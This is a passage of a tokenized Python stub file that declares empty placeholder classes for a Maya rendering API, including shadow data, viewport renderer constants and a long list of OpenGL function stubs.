pass <EOL> def resolution ( * args , ** kwargs ) : <EOL> pass <EOL> def swatchNode ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MRenderShadowData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def worldToZbuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def zbufferToWorld ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> depthMaps = None <EOL> internalData = None <EOL> lightPosition = None <EOL> lightType = None <EOL> midDistMaps = None <EOL> perspective = None <EOL> perspectiveMatrix = None <EOL> projectionMatrix = None <EOL> shadowResX = None <EOL> shadowResY = None <EOL> thisown = None <EOL> useMidDistMap = None <EOL> __swig_destroy__ = None <EOL> kDirectional = <NUM_LIT:2> <EOL> kInvalid = <NUM_LIT:0> <EOL> kPoint = <NUM_LIT:1> <EOL> kSpot = <NUM_LIT:3> <EOL> class MGeometryRequirements ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addBinormal ( * args , ** kwargs ) : <EOL> pass <EOL> def addColor ( * args , ** kwargs ) : <EOL> pass <EOL> def addComponentId ( * args , ** kwargs ) : <EOL> pass <EOL> def addFaceOffsets ( * args , ** kwargs ) : <EOL> pass <EOL> def addNormal ( * args , ** kwargs ) : <EOL> pass <EOL> def addPosition ( * args , ** kwargs ) : <EOL> pass <EOL> def addTangent ( * args , ** kwargs ) : <EOL> pass <EOL> def addTexCoord ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MViewportRenderer ( _object ) : <EOL> def UIname ( * args , ** kwargs ) : <EOL> pass <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def deregisterRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def initialize ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def nativelySupports ( * args , ** kwargs ) : <EOL> pass <EOL> def override ( * args , ** kwargs ) : <EOL> pass <EOL> def overrideThenStandardExclusion ( * args , ** kwargs ) : <EOL> pass <EOL> def registerRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def render ( * args , ** kwargs ) : <EOL> pass <EOL> def renderingOverride ( * args , ** kwargs ) : <EOL> pass <EOL> def setRenderingOverride ( * args , ** kwargs ) : <EOL> pass <EOL> def setUIName ( * args , ** kwargs ) : <EOL> pass <EOL> def uninitialize ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kDirect3D = <NUM_LIT:1> <EOL> kExcludeAll = - <NUM_LIT:1> <EOL> kExcludeCVs = <NUM_LIT> <EOL> kExcludeCameras = <NUM_LIT:32> <EOL> kExcludeDeformers = <NUM_LIT> <EOL> kExcludeDimensions = <NUM_LIT> <EOL> kExcludeDynamicConstraints = <NUM_LIT> <EOL> kExcludeDynamics = <NUM_LIT> <EOL> kExcludeFluids = <NUM_LIT> <EOL> kExcludeFollicles = <NUM_LIT> <EOL> kExcludeGrid = <NUM_LIT> <EOL> kExcludeHairSystems = <NUM_LIT> <EOL> kExcludeHulls = <NUM_LIT> <EOL> kExcludeIkHandles = <NUM_LIT> <EOL> kExcludeImagePlane = <NUM_LIT> <EOL> kExcludeJoints = <NUM_LIT:64> <EOL> kExcludeLights = <NUM_LIT:16> <EOL> kExcludeLocators = <NUM_LIT> <EOL> kExcludeManipulators = <NUM_LIT> <EOL> kExcludeMeshes = <NUM_LIT:4> <EOL> kExcludeMotionTrails = <NUM_LIT> <EOL> kExcludeNCloths = <NUM_LIT> <EOL> kExcludeNParticles = <NUM_LIT> <EOL> kExcludeNRigids = <NUM_LIT> <EOL> kExcludeNone = <NUM_LIT:0> <EOL> kExcludeNurbsCurves = <NUM_LIT:1> <EOL> kExcludeNurbsSurfaces = <NUM_LIT:2> <EOL> kExcludePivots = <NUM_LIT> <EOL> kExcludePlanes = <NUM_LIT:8> <EOL> kExcludePluginShapes = <NUM_LIT> <EOL> kExcludeSelectHandles = <NUM_LIT> <EOL> kExcludeStrokes = <NUM_LIT> <EOL> kExcludeSubdivSurfaces = <NUM_LIT> <EOL> kExcludeTextures = <NUM_LIT> <EOL> kNoOverride = <NUM_LIT:0> <EOL> kOpenGL = <NUM_LIT:0> <EOL> kOverrideAllDrawing = <NUM_LIT:1> <EOL> kOverrideThenStandard = <NUM_LIT:2> <EOL> kOverrideThenUI = <NUM_LIT:3> <EOL> kSoftware = <NUM_LIT:2> <EOL> class MGLFunctionTable ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def extensionExists ( * args , ** kwargs ) : <EOL> pass <EOL> def glAccum ( * args , ** kwargs ) : <EOL> pass <EOL> def glActiveTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glActiveVaryingNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFragmentOp1ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFragmentOp2ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFragmentOp3ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glAreProgramsResidentNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glAreTexturesResident ( * args , ** kwargs ) : <EOL> pass <EOL> def glArrayElement ( * args , ** kwargs ) : <EOL> pass <EOL> def glAttachObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBegin ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginOcclusionQueryNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginQueryARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginTransformFeedbackEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginTransformFeedbackNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindAttribLocationARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferBaseEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferBaseNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferOffsetEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferOffsetNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferRangeEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferRangeNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindFramebufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindLightParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindMaterialParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindProgram ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindRenderbufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindTexGenParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindTextureUnitParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBitmap ( * args , ** kwargs ) : <EOL> pass <EOL> def glBlendEquationEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBlendFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glBlitFramebufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBufferDataARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBufferSubDataARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCallList ( * args , ** kwargs ) : <EOL> pass <EOL> def glCallLists ( * args , ** kwargs ) : <EOL> pass <EOL> def glCheckFramebufferStatusEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glClear ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearAccum ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearColor ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearDepth ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearIndex ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearStencil ( * args , ** kwargs ) : <EOL> pass <EOL> def glClientActiveTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glClipPlane ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3b ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3ub ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3ubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3ui ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3uiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3us ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3usv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4b ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4ub ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4ubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4ui ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4uiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4us ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4usv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorFragmentOp1ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorFragmentOp2ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorFragmentOp3ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorMaterial ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerInputNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerOutputNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameterfNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameteriNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompileShaderARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexSubImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexSubImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexSubImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexSubImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexSubImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexSubImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCreateProgramObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCreateShaderObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCullFace ( * args , ** kwargs ) : <EOL> pass <EOL> def glCullParameterdvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glCullParameterfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteBuffersARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteFencesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteFramebuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteLists ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteOcclusionQueriesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeletePrograms ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteProgramsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteQueriesARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteRenderbuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteTextures ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDepthFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glDepthMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glDepthRange ( * args , ** kwargs ) : <EOL> pass <EOL> def glDetachObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisable ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisableClientState ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisableVariantClientStateEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisableVertexAttribArray ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawArrays ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawElements ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawRangeElements ( * args , ** kwargs ) : <EOL> pass <EOL> def glEdgeFlag ( * args , ** kwargs ) : <EOL> pass <EOL> def glEdgeFlagPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glEdgeFlagv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnable ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnableClientState ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnableVariantClientStateEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnableVertexAttribArray ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnd ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndList ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndOcclusionQueryNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndQueryARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndTransformFeedbackEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndTransformFeedbackNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalMesh1 ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalMesh2 ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalPoint1 ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalPoint2 ( * args , ** kwargs ) : <EOL> pass <EOL> def glExecuteProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glExtractComponentEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFeedbackBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glFinalCombinerInputNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glFinish ( * args , ** kwargs ) : <EOL> pass <EOL> def glFinishFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glFlush ( * args , ** kwargs ) : <EOL> pass <EOL> def glFlushVertexArrayRangeNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoordPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoorddEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoorddvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoordfEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoordfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogf ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogi ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferRenderbufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferTexture1DEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferTexture2DEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferTexture3DEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFrontFace ( * args , ** kwargs ) : <EOL> pass <EOL> def glFrustum ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenBuffersARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenFencesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenFragmentShadersATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenFramebuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenLists ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenOcclusionQueriesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenPrograms ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenProgramsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenQueriesARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenRenderbuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenSymbolsEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenTextures ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenVertexShadersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenerateMipmapEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetActiveAttribARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetActiveUniformARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetActiveVaryingNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetAttachedObjectsARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetAttribLocationARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBooleanv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBufferParameterivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBufferPointervARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBufferSubDataARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetClipPlane ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerInputParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerInputParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerOutputParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerOutputParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCompressedTexImage ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetDoublev ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetError ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFenceivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFinalCombinerInputParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFinalCombinerInputParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFloatv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFramebufferAttachmentParameterivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetHandleARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInfoLogARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetIntegerv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInvariantBooleanvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInvariantFloatvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInvariantIntegervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLightfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLightiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLocalConstantBooleanvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLocalConstantFloatvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLocalConstantIntegervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMapdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMapfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMapiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMaterialfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMaterialiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetObjectParameterfvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetObjectParameterivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetOcclusionQueryivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetOcclusionQueryuivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPixelMapfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPixelMapuiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPixelMapusv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPointerv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPolygonStipple ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramEnvParameterdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramEnvParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramLocalParameterdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramLocalParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramParameterdvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramString ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramStringNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetQueryObjectivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetQueryObjectuivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetQueryivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetRenderbufferParameterivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetShaderSourceARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetString ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexEnvfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexEnviv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexGendv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexGenfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexGeniv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexImage ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexLevelParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexLevelParameteriv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexParameteriv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTrackMatrixivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTransformFeedbackVaryingEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTransformFeedbackVaryingNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetUniformLocationARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetUniformfvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetUniformivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantBooleanvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantFloatvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantIntegervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantPointervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVaryingLocationNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribPointerv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribPointervNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribdvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glHint ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexd ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexf ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexi ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexs ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexsv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexub ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glInitNames ( * args , ** kwargs ) : <EOL> pass <EOL> def glInsertComponentEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glInterleavedArrays ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsEnabled ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsFramebufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsList ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsOcclusionQueryNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsProgram ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsQueryARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsRenderbufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsVariantEnabledEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModelf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModelfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModeli ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModeliv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLighti ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLineStipple ( * args , ** kwargs ) : <EOL> pass <EOL> def glLineWidth ( * args , ** kwargs ) : <EOL> pass <EOL> def glLinkProgramARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glListBase ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadIdentity ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadMatrixd ( * args , ** kwargs ) : <EOL> pass 